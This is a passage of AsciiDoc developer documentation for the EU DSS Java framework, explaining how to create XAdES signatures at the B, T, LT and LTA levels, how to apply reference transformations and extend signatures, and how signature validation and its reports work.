|icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n|PAdES 2+|Enveloped |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"]\n.6+|JAdES .3+|Enveloping |Compact Serialization |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"]\n |Flattened JSON Serialization |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n |JSON Serialization |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n .3+|Detached |Compact Serialization |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |SigD only |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"]\n |Flattened JSON Serialization |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |SigD only |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n |JSON Serialization |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |SigD only |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n.2+|ASiC |ASiCS |CAdES \/ XAdES |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"]\n |ASiCE |CAdES \/ XAdES |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"]\n|===\n\n[.portrait]\n<<<\n\n== The XML Signature (XAdES)\n\nThe simplest way to address the digital signature passes through the XAdES format. Indeed, it allows visualization of the signature content with a simple text editor. Thus it becomes much easier to make the connection between theoretical concepts and their implementation. Before embarking on the use of the DSS framework, it is advisable to read the following documents:\n\n * XAdES Specifications (cf. <<R01>>)\n\nAfter reading these documents, it is clear that:\n\n * To electronically sign a document, a signing certificate (that proves the signer's identity) and the access to its associated private key is needed. \n * To electronically validate a signed document the signer's certificate containing the public key is needed. To give a more colourful example: when a digitally signed document is sent to a given person or organization in order to be validated, the certificate with the public key used to create the signature must also be provided.\n\n===\tXAdES Profiles\n\nThe new ETSI standard defines four conformance levels to address the growing need to protect the validity of the signature in time. Henceforth to denote the level of the signature the word \"level\" will be used. Follows the list of levels defined in the standard:\n\n * XAdES-BASELINE-*B*: _Basic Electronic Signature_\nThe lowest and simplest version just containing the SignedInfo, SignatureValue, KeyInfo and SignedProperties. This level combines the old -BES and -EPES levels.\nThis form extends the definition of an electronic signature to conform to the identified signature policy.\n * XAdES-BASELINE-*T*: _Signature with a timestamp_\nA timestamp regarding the time of signing is added to protect against repudiation.\n * XAdES-BASELINE-*LT*: _Signature with Long Term Data_\nCertificates and revocation data are embedded to allow verification in future even if their original source is not available. This level is equivalent to the old -XL level.\n * XAdES-BASELINE-*LTA*: _Signature with Long Term Data and Archive timestamp_\nBy using periodical timestamping (e.g. each year) compromising is prevented which could be caused by weakening previous signatures during a long-time storage period. This level is equivalent to the old -A level.\n\nNOTE: Old levels: -BES, -EPES, -C, -X, -XL, -A are not supported any more when signing.\n\n==== XAdES-BASELINE-B\n\nTo start, let's take a simple XML document:\n\n[[xml_example.xml]]\n[source,xml]\n.xml_example.xml\n----\n<?xml version=\"1.0\"?>\n<test>Hello World !<\/test>\n----\n\nSince this is an XML document, we will use the XAdES signature and more particularly XAdES-BASELINE-B level, which is the lowest level of protection: just satisfying Directive (cf. <<R07>>) legal requirements for advanced signature. The normal process of signing wants to sign first with the level -B or level-T, and then later when it becomes necessary to complete the signature with superior levels. However, the framework allows signing directly with any level.\nWhen signing data, the resulting signature needs to be linked with the data to which it applies. This can be done either by creating a data set which combines the signature and the data (e.g. by enveloping the data with the signature or including a signature element in the data set) or placing the signature in a separate resource and having some external means for associating the signature with the data. So, we need to define the packaging of the signature, namely ENVELOPED, ENVELOPING, DETACHED or INTERNALLY-DETACHED. More information about supported reference transformations for each signature packaging (except 'Detached'), can be found in the section <<Reference Transformations>>\n \n * *ENVELOPED :* when the signature applies to data that surround the rest of the document;\n * *ENVELOPING :* when the signed data form a sub-element of the signature itself;\n ** Base64 encoded binaries;\n ** Embed XML object(s);\n ** Embed https:\/\/www.w3.org\/TR\/xmldsig-core\/#sec-o-Manifest[Manifest] object(s).\n * *DETACHED :* when the signature relates to the external resource(s) separated from it.\n * *INTERNALLY-DETACHED :* when the signature and the related signed data are both included in a parent element (only XML).\n\nFor our example, we will use ENVELOPED packaging.\n\nThe DSS framework uses 3 atomic steps to sign a document :\n\n. Compute the digest to be signed;\n. Sign the digest; \n. Sign the document (add the signed digest).\n\nThe DSS fully manages the steps 1 and 3. We need to specify how to do the signature operation. DSS offers some implementations in the dss-token module\n\nTo write our Java code, we still need to specify the type of KeyStore to use for signing our document, more simply, where the private key can be found. In the package \"eu.europa.esig.dss.token\", we can choose between different connection tokens :\n\n * *Pkcs11SignatureToken :* allows communicating with SmartCards with the PKCS#11 interface. It requires some installed drivers (dll, sso,...) .\n * *Pkcs12SignatureToken :* allows signing with a PKC#12 keystore (.p12 file).\n * *MSCAPISignatureToken :* handles the signature with MS CAPI (the Microsoft interface to communicate with SmartCards).\n * *JKSSignatureToken :* allows signing with a Java Key Store (.jks file).\n\nNOTE: The DSS also provides the support for MOCCA framework to communicate with the Smartcard with PC\/SC, but it involves the installation of the MOCCA and IAIK libraries.\n\nTo know more about the use of the different signature tokens, please consult \"Management of Signature Tokens\" chapter.\n\nIn our example the class: \"Pkcs12SignatureToken\" will be used. A file in PKCS#12 format must be provided to the constructor of the class. It contains an X.509 private key accompanying the public key certificate and protected by symmetrical password. The certification chain can also be included in this file. It is possible to generate dummy certificates and their chains with OpenSSL. Please visit http:\/\/www.openssl.org\/ for more details.\n\nThis is the complete code that allows you to sign our XML document.\n\n[source,java,indent=0]\n.Create a XAdES signature\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBTest.java[tags=demo]\n----\n\nWhat you may notice is that to sign a document we need to:\n\n * Create an object based on SignatureParameters class. The number of specified parameters depends on the type of signature. Generally, the number of specified parameters depends on the profile of signature. This object also defines some default parameters.\n * Choose the profile, packaging, signature digest algorithm.\n * Indicate the private key entry to be used.\n * Instantiate the adequate signature service.\n * Carry out the signature process.\n \nThe encryption algorithm is determined by the private key and therefore cannot be compelled by the setter of the signature parameters object. It will cause an inconsistency in the signature making its validation impossible. This setter can be used in a particular context where the signing process is distributed on different machines and the private key is known only to the signature value creation process. See clause \"Signing process\" for more information.\nIn the case where the private key entry object is not available, it is possible to choose the signing certificate and its certificate chain as in the following example:\n\n[source,java,indent=0]\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/Snippets.java[tags=demoCertificateChain]\n----\n\nIntegrating the certificate chain in the signature simplifies the build of a prospective certificate chain during the validation process.\n\nBy default the framework uses the current date time to set the signing date, but in the case where it is necessary to indicate the different time it is possible to use the setter \"setSigningDate(Date)\" as in the example:\n\n[source,java,indent=0]\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/Snippets.java[tags=demoSigningDate]\n----\n\nWhen the specific service is instantiated a certificate verifier must be set. This object is used to provide four different sources of information:\n\n * the source of trusted certificates (based on the trusted list(s) specific to the context);\n * the source of intermediate certificates used to build the certificate chain till the trust anchor. This source is only needed when these certificates are not included in the signature itself;\n * the source of OCSP;\n * the source of CRL.\n \nIn the current implementation this object is only used when profile -LT or -LTA are created. \n\n===== Signing process\n\nOnce the parameters of the signature were identified the service object itself must be created. The service used will depend on the type of document to sign. In our case it is an XML file, so we will instantiate a XAdES service. The process of signing takes place in three stages. The first is the `getDataToSign()` method call, passing as a parameter the document to be signed and the previously selected settings. This step returns the data which is going to be digested and encrypted. In our case it corresponds to the SignedInfo XMLDSig element. \n\n[source,java,indent=0]\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/Snippets.java[tags=demoSigningProcessGetDataToSign]\n----\n\nThe next step is a call to the function `sign()` which is invoked on the object token representing the KeyStore and not on the service. This method takes three parameters. The first is the array of bytes that must be signed. It is obtained by the previous method invocation. The second is the algorithm used to create the digest. You have the choice between SHA1, SHA256, and SHA512 (this list is not exhaustive). And the last one is the private key entry.\n\n[source,java,indent=0]\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/Snippets.java[tags=demoSigningProcessSign]\n----\n\nThe last step of this process is the integration of the signature value in the signature and linking of that one to the signed document based on the selected packaging method. This is the method `signDocument()` on the service. We must pass to it three parameters: again the document to sign, the signature parameters and the value of the signature obtained in the previous step.\n\nThis separation into three steps allows use cases where different environments have their precise responsibilities: specifically the distinction between communicating with the token and executing the business logic.\n\nWhen the breakdown of this process is not necessary, than a simple call to only one method can be done as in the following example:\n\n[source,java,indent=0]\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/Snippets.java[tags=demoSigningProcessSignDocument]\n----\n\n===== Additional attributes\n\nFor this type (XAdES-BASELINE-B) of signature it is possible to identify some additional attributes.\n\n[[SignXmlXadesBPropertiesTest.java]]\n[source,java,indent=0]\n.XAdES signature with additional signed attributes\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBPropertiesTest.java[tags=demo]\n----\n\nIn XAdES format the following types of a Content Timestamp can be used:\n\n * AllDataObjectsTimeStamp - each time-stamp token within this property covers the full set of references defined in the Signature's SignedInfo element, excluding references of type \"SignedProperties\".\n * IndividualDataObjectsTimeStamp - each time-stamp token within this property covers selected signed data objects.\n\nThe code above produces the following signature :\n\n.XAdES signature example\ninclude::_samples\/xades-b-properties.adoc[]\n\n==== XAdES-BASELINE-T\n\nXAdES-BASELINE-T is a signature for which there exists a trusted time associated to the signature. It provides the initial steps towards providing long term validity and more specifically it provides a protection against repudiation. This extension of the signature can be created as well during the generation process as validation process. However, the case when these validation data are not added during the generation process should no longer occur. The XAdES-BASELINE-T trusted time indications must be created before the signing certificate has been revoked or expired and close to the time that the XAdES signature was produced. The XAdES-BASELINE-T form must be built on a XAdES-BASELINE-B form. The DSS framework allows extending the old -BES and -EPES profiles to the new BASELINE-T profile, indeed there is no difference in the structure of the signature.\n\nTo implement this profile of signature you must indicate to the service the TSA source, which delivers from each Timestamp Request a Timestamp Response (RFC 3161 (cf. <<R08>>)) containing tokens. Below is the source code that creates a XAdES-BASELINE-T signature. For our example, we will use the Belgian provider and an instance of OnlineTSPSource (see \"TSP Sources\" chapter for more details).\n\n[source,java,indent=0]\n.Create a XAdES-Baseline-T with an OnlineTSPSource\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesTWithOnlineSourceTest.java[tags=demo]\n----\n\nIf the timestamp source is not set a NullPointerException is thrown.\n\nThe SignatureTimeStamp mandated by the XAdES-T form appears as an unsigned property within the QualifyingProperties:\n\n.XAdES Signature Timestamp\ninclude::_samples\/xades-signature-timestamp.adoc[]\n\n==== XAdES-BASELINE-LT\n\nThis level has to prove that the certification path was valid, at the time of the validation of the signature, up to a trust point according to the naming constraints and the certificate policy constraints from the \"Signature Validation Policy\". It will add to the signature the CertificateValues and RevocationValues unsigned properties. The CertificateValues element contains the full set of certificates that have been used to validate the electronic signature, including the signer's certificate. However, it is not necessary to include one of those certificates, if it is already present in the ds:KeyInfo element of the signature. This is like DSS framework behaves. In order to find a list of all the certificates and the list of all revocation data, an automatic process of signature validation is executed. To carry out this process an object called CertificateVerifier must be passed to the service. The implementer must set some of its properties (e.g. a source of trusted certificates). The code below shows how to use the default parameters with this object. Please refer to \"The Signature Validation\" chapter to have the further information. It also includes an example of how to implement this level of signature:\n\n[[SignXmlXadesLTTest.java]]\n[source,java,indent=0]\n.SignXmlXadesLTTest.java\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesLTTest.java[tags=demo]\n----\n\nThe following XML segment will be added to the signature qualified and unsigned properties:\n\n.Validation data values\ninclude::_samples\/xades-revocation-data.adoc[]\n\nNOTE: The use of online sources can significantly increase the execution time of the signing process. For testing purpose you can create your own source of data.\n\nIn last example the CommonsHttpDataLoader is used to provide the communication layer for HTTP protocol. Each source which need to go through the network to retrieve data need to have this component set.\n\n==== XAdES-BASELINE-LTA\n\nWhen the cryptographic data becomes weak and the cryptographic functions become vulnerable the auditor should take steps to maintain the validity of the signature. The XAdES-BASELINE-A form uses a simple approach called \"archive validation data\". It adds additional time-stamps for archiving signatures in a way that they are still protected, but also to be able to prove that the signatures were validated at the time when the used cryptographic algorithms were considered safe. The time-stamping process may be repeated every time the protection used becomes weak. Each time-stamp needs to be affixed before either the signing key or the algorithms used by the TSA are no longer secure. XAdES-A form adds the ArchiveTimestamp element within the UnsignedSignatureProperties and may contain several ArchiveTimestamp elements.\n\nBelow is an example of the implementation of this level of signature (but in practice, we will rather extend the signature to this level when there is a risk that the cryptographic functions become vulnerable or when one of certificates arrives to its expiration date):\n\n[source,java,indent=0]\n.Signature level setting\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/Snippets.java[tags=demoSignatureLevel]\n----\n\nThe following XML segment will be added to the signature qualified and unsigned properties:\n\n.XAdES Archive Timestamp\ninclude::_samples\/xades-archive-timestamp.adoc[]\n\n=== Versions support\n\nDSS supports the following XAdES formats :\n\n[cols=\"5*^\"]\n.Supported XAdES versions\n|===\n| | B-level | T-level | LT-level | LTA-level\n\n| XAdES 1.1.1 | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:times-circle[role=\"red\"]\n\n| XAdES 1.2.2 | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:times-circle[role=\"red\"]\n\n| XAdES 1.3.2 | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"]\n\n| XAdES 1.4.1 4+| The format contains qualifying properties for XAdES 1.3.2 LTA level\n|===\n\nThe XAdES Profile, as well as a customizable prefixes can be set with following methods :\n\n[source,java,indent=0]\n.XAdES formats and prefixes\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBWithTransformsTest.java[tags=demoPrefixes]\n----\n\n=== Reference Transformations\n\nIn case of 'Enveloping', 'Enveloped' and 'Internally Detached' signatures, it is possible to apply custom transformations for signing references in order to compute proper digest result. Example of a definition reference transformations, you can find below:\n\n[[SignXmlXadesBWithTransformsTest.java]]\n[source,java,indent=0]\n.Custom transformations definition\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBWithTransformsTest.java[tags=demo]\n----\n\nCurrent version of DSS supports the following transformations:\n\n * Enveloped - removes the current `Signature` element from the digest calculation of the reference.\n\nWARNING: Enveloped Signature Transform does not support parallel signatures!\n\n[source,java,indent=0]\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBWithTransformsTest.java[tags=demoEnvelopedTransform]\n----\n\n * Canonicalization - any canonicalization algorithm that can be used for 'CanonicalizationMethod' can be used as a transform:\n\n[source,java,indent=0]\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBWithTransformsTest.java[tags=demoCanonicalizationTransform]\n----\n\n * Base64 - the transform is used if application needs to sign a RAW data (binaries, images, audio or other formats). The 'Base64 Transform' is not compatible with following signature parameters:\n\n ** Reference contains more than one transform (must be a sole element of the reference transforms);\n ** setEmbedXML(true) - embedded setting cannot be used;\n ** setManifestSignature(true) - As is apparent from the previous point, Manifest cannot be used with the Base64 Transform as well since it also must be embedded to the signature.\n\n[source,java,indent=0]\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBWithTransformsTest.java[tags=demoBase64Transform]\n----\n\n * XPath - allows signing a custom nodes in a signature or embedded document. DSS contains an additional class `XPathEnvelopedSignatureTransform` allowing to exclude signatures from the digested content (used for Enveloped signatures by default). Additional information about the 'XPath Transform' can be found https:\/\/www.w3.org\/TR\/xpath20\/[by the link].\n\n[source,java,indent=0]\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBWithTransformsTest.java[tags=demoEnvelopedXPathTransform]\n----\n\n * XPath-2-Filter - an alternative to 'XPath Transform'. Additional information about the 'XPath2Filter Transform' can be found https:\/\/www.w3.org\/TR\/xmldsig-filter2\/[by the link]. DSS contains an additional class `XPath2FilterEnvelopedSignatureTransform` allowing to exclude signatures from the digest calculation.\n\nNOTE: Since DSS 5.7 the XPath-2-Filter transform is used by default for ENVELOPED signature packaging.\n\n[source,java,indent=0]\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBWithTransformsTest.java[tags=demoEnvelopedXPath2FilterTransform]\n----\n\n * XSLT Transform - This transform requires a 'org.w3.dom.Document' as an input, compatible with the normative https:\/\/www.w3.org\/TR\/xslt-30\/[XSLT Specification]. Must be a sole transform.\n\nNOTE: All transformations, except Base64, can be applied only to XML objects.\n\n=== Multiple signatures\n\nIn everyday life, there are many examples where it is necessary to have multiple signatures covering the same document, such as a contract to purchase a vehicle. Independent signatures are parallel signatures where the ordering of the signatures is not important. The computation of these signatures is performed on exactly the same input but using different private keys.\n\n=== XAdES and specific schema version\n\nSome signatures may have been created with an older version of XAdES standard using different schema definition. To take into account the validation of such signatures the interface eu.europa.esig.dss.xades.definition.XAdESPaths was created. This interface allows to provide the different needed XPath expressions which are used to explore the elements of the signature. The DSS framework proposes 3 implementations : \n\n * XAdES132Paths (XAdES 1.3.2 \/ 1.4.1)\n * XAdES122Paths (XAdES 1.2.2)\n * XAdES111Paths (XAdES 1.1.1)\n\nBy default, all XAdES are supported and DSS loads\/parses all versions of XAdES. That's possible to restrict to only one version of XAdES with the following code : \n\n[source,java,indent=0]\n.Customize the supported XAdES version(s) at the validation\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/validate\/XAdES132OnlyTest.java[tags=demo]\n----\n\n=== Sign a Trusted List\n\nThe standard ETSI TS 119 612 specifies in its annex B the XML structure and the format of the signature (XAdES, enveloped signature, transformation, canonicalization, etc.). With the class `TrustedListSignatureParametersBuilder`, DSS is able to pre-configure the signature parameters to comply with the specifications and simplify the signature creation.\n\n[source,java,indent=0]\n.Sign a Trusted List with the TrustedListSignatureParametersBuilder\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignTrustedListTest.java[tags=demo]\n----\n\n== Signature Extension\n\nThe -B level contains immutable signed properties. Once this level is created, these properties cannot be changed.\n\nThe levels -T\/-LT\/-LTA add unsigned properties to the signature. This means that the properties of these levels could be added afterwards to any AdES signature. This addition helps to make the signature more resistant to cryptographic attacks on a longer period of time. The extension of the signature is incremental, i.e. when you want to extend the signature to the level -LT the lower level (-T) will also be added. The whole extension process is implemented by reusing components from signature production. To extend a signature we proceed in the same way as in the case of a signature, except that you have to call the function \"extendDocument\" instead of the \"sign\" function. Note that when the document is signed with several signatures then they are all extended.\n\n=== BASELINE-T\n\nThe AdES-BASELINE-T trusted time indications have to be created before a certificate has been revoked or expired and close to the time that the AdES signature was produced. It provides a protection against repudiation. The framework adds the timestamp only if there is no timestamp or there is one but the creation of a new extension of the level-T is deliberate (using another TSA). It is not possible to extend a signature which already incorporates higher level as -LT or -LTA. In the theory it would be possible to add another -T level when the signature has already reached level -LT but the framework prevents this operation. Note that if the signed document contains multiple signatures, then all the signatures will be extended to level -T. It is also possible to sign a document directly at level -T.\n\nHere is an example of creating an extension of type T:\n\n[source,java,indent=0]\n.Extend a XAdES signature\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/ExtendSignXmlXadesBToTTest.java[tags=demo]\n----\n\nHere is the result of adding a new extension of type-T to an already existing -T level signature:\n\n.XAdES Unsigned Signature Properties\ninclude::_samples\/xades-extend-t-to-t.adoc[]\n\n=== BASELINE-LT and -LTA\n\nFor these types of extensions, the procedure to follow is the same as the case of the extension of type T. Please refer to the chapter XAdES Profiles to know specific parameters for each level of signature and which must be positioned.\n\n[[signatureValidation]]\n== Signature Validation\n\nGenerally and following ETSI standard, the validation process of an electronic signature must provide one of these three following statuses: TOTAL-FAILED, TOTAL-PASSED or INDETERMINATE. A TOTAL-PASSED response indicates that the signature has passed verification and it complies with the signature validation policy. A TOTAL_FAILED response indicates that either the signature format is incorrect or that the digital signature value fails the verification. An INDETERMINATE validation response indicates that the format and digital signature verifications have not failed but there is an insufficient information to determine if the electronic signature is valid. For each of the validation checks, the validation process must provide information justifying the reasons for the resulting status indication as a result of the check against the applicable constraints. In addition, the ETSI standard defines a consistent and accurate way for justifying statuses under a set of sub-indications.\n\n===\tValidation Process\n\nSince version 4.7 of the DSS framework the validation process is based on the latest ETSI standard <<R09>>. It is driven by the validation policy and allows long term signature validation. It not only verifies the existence of certain data and their validity, but it also checks the temporal dependences between these elements. The signature check is done following basic building blocks. On the simplified diagram below, showing the process of the signature validation, you can follow the relationships between each building block which represents a logic set of checks used in validation process.\n\n.Signature Validation Process\nimage::sig_validation_process.jpg[]\n\nNote that the current version of the framework during the validation process does not indicate what part of a document was signed. However, in a case of XAdES signature XPath transformations presented in the signature will be applied, in the case of CAdES or PAdES signature the whole document must be signed.\n\nAt the end of the validation process four reports are created. They contain the different detail levels concerning the validation result. They provide four kinds of visions for the validation process: macroscopic, microscopic, input data and ETSI Validation report conformant with the standard <<R09>>. For more information about these reports, please refer to \"Simple Report\" chapter.\n\nBelow is the simplest example of the validation of the signature of a document. The first thing to do is instantiating an object named validator, which orchestrates the verification of the different rules. To perform this it is necessary to invoke a static method fromDocument() on the abstract class `SignedDocumentValidator`. This method returns the object in question whose type is chosen dynamically based on the type of source document. \n\nThe next step is to create an object that will check the status of a certificate using the Trusted List model (see \"Trusted Lists of Certification Service Provider\" for more information). In order to achieve this, an instance of a `CertificateVerifier` must be created with a defined source of trusted certificates. In our example, the trusted source is instantiated with `CommonTrustedCertificateSource` class. As well as a trusted source the CertificateVerifier object needs an OCSP and\/or CRL source and a TSL source (which defines how the certificates are retrieved from the Trusted Lists). See chapter \"Management of CRL and OCSP Sources\" for more information concerning sources.\n\n[source,java,indent=0]\n.Validation of a signature\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/validate\/ValidateSignedXmlXadesBTest.java[tags=demo]\n----\n\nNOTE: When using the TrustedListsCertificateSource class, for performance reasons, consider creating a single instance of this class and initialize it only once.\n\nNOTE: In general, the signature must cover the entire document so that the DSS framework can validate it. However, for example in the case of a XAdES signature, some transformations can be applied on the XML document. They can include operations such as canonicalization, encoding\/decoding, XSLT, XPath, XML schema validation, or XInclude. XPath transforms permit the signer to derive an XML document that omits portions of the source document. Consequently those excluded portions can change without affecting signature validity. \n\n[[signedDocumentValidator]]\n==== SignedDocumentValidator\n\nFor execution of the validation process, DSS uses the 'SignedDocumentValidator' class. The DSS framework provides five implementations of validator:\n \n * `XMLDocumentValidator` - validates documents in XML format (XAdES format);\n * `CMSDocumentValidator` - validates documents in CMS format (CAdES format);\n * `PDFDocumentValidator` - validates documents in PDF format (PADES format);\n * `JWSCompactDocumentValidator` - validates documents with base64url encoded content (JAdES compact format);\n * `JWSSerializationDocumentValidator` - validates documents in JSON format (JAdES serialization formats);\n * `ASiCContainerWithXAdESValidator` - validates ASiC with XAdES containers;\n * `ASiCContainerWithCAdESValidator` - validates ASiC with CAdES containers;\n * `DetachedTimestampValidator` - validates CMS timestamps provided alone.\n\nDSS initializes a relevant validator based on specific characteristics of an input file (e.g. a PDF file version declaration for a PDF file). It checks the file format and loads the required validator from a classpath. Below you can find a list of settings that can be used for the configuration of the class.\n\n[source,java,indent=0]\n.SignedDocumentValidator usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/SignedDocumentValidatorTest.java[tags=demo]\n----\n\n===\tValidation Result Materials\n\nThe result of the validation process consists of three elements: \n\n * the Simple Report, \n * the Detailed Report,\n * the Diagnostic Data and\n * the ETSI Validation Report.\n \nAll these reports are encoded using XML, which allows the implementer to easily manipulate and extract information for further analysis. For each report, XML Schema and JaxB model are available as maven dependencies.\n\nDSS also provides XSLT to able to generate PDF or HTML reports (simple and detailed reports).\n\nYou will find below a detailed description of each of these elements.\n\n==== Simple Report \n\nThis is a sample of the simple validation report:\n\n.Simple Report \ninclude::_samples\/simple-report-example.adoc[]\n\nThe result of the validation process is based on very complex rules. The purpose of this report is to make as simple as possible the information while keeping the most important elements. Thus the end user can, at a glance, have a synthetic view of the validation. To build this report the framework uses some simple rules and the detailed report as input.\n\n==== Detailed Report\n\nThis is a sample of the detailed validation report. Its structure is based on the ETSI standard <<R09>> and is built around Basic Building Blocks, Basic Validation Data, Timestamp Validation Data, AdES-T Validation Data and Long Term Validation Data. Some segments were deleted to make reading easier. They are marked by three dots:\n\n.Detailed Report \ninclude::_samples\/detailed-report-example.adoc[]\n\nFor example the Basic Building Blocks are divided into seven elements:\n\n * FC - Format Checking\n * ISC - Identification of the Signing Certificate\n * VCI - Validation Context Initialization\n * RFC - Revocation Freshness Checker\n * XCV - X.509 certificate validation\n * CV - Cryptographic Verification\n * SAV - Signature Acceptance Validation\n \nThe following additional elements also can be executed in case of validation in the past : \n\n * PCV - Past Certificate Validation\n * VTS - Validation Time Sliding process\n * POE extraction - Proof Of Existence extraction \n * PSV - Past Signature Validation\n\nPast certificate\/signature validation is used when basic validation of a certificate\/signature fails at the current time with an INDETERMINATE status such that the provided proofs of existence may help to go to a determined status. The process shall initialize the _best-signature-time_ either to a time indication for a related POE provided, or the current time when this parameter has not been used by the algorithm.\n\n * *Best-signature-time* is an internal variable for the algorithm denoting the earliest time when it can be trusted by the SVA (either because proven by some POE present in the signature or passed by the DA and for this reason assumed to be trusted) that a signature has existed. <<R09>>\n\nEach block contains a number of rules that are executed sequentially. The rules are driven by the constraints defined in the validation policy. The result of each rule is OK or NOT OK. The process is stopped when the first rule fails. Each block also contains a conclusion. If all rules are met then the conclusion node indicates PASSED. Otherwise FAILED or INDETERMINATE indication is returned depending on the ETSI standard definition. \n\n==== Diagnostic Data\n\nThis is a data set constructed from the information contained in the signature itself, but also from information retrieved dynamically as revocation data and information extrapolated as the mathematical validity of a signature. All this information is independent of the applied validation policy. Two different validation policies applied to the same diagnostic data can lead to different results.\n\nThis is an example of the diagnostic data for a XAdES signature. Certain fields and certain values were trimmed or deleted to make reading easier:\n\n.Diagnostic Data\ninclude::_samples\/diagnostic-data-example.adoc[]\n\n==== ETSI Validation Report\n\nThe ETSI Validation Report represents an implementation of TS 119 102-2 (cf. <<R13>>). The report contains a standardized result of an ASiC digital signature validation. It includes the original validation input data, the applied validation policy, as well as the validation result of one or more signature(s) and its(their) constraints.\n\nThis is an example of the ETSI validation report:\n\n.ETSI Validation Report (TS 119 102-2)\ninclude::_samples\/etsi-validation-report-example.adoc[]\n\n[[validationPolicy]]\n=== Validation Policy\n\nThe validation process may be driven by a set of constraints that are contained in the XML policy file.\n\nIn order to run a validation process with a custom validation policy, an XML file shall be created in compliance with the https:\/\/github.com\/esig\/dss\/blob\/master\/dss-policy-jaxb\/src\/main\/resources\/xsd\/policy.xsd[policy.xsd] schema and passed to the relevant `DocumentValidator` as shown below.\n\n[source,java,indent=0]\n.Custom validation 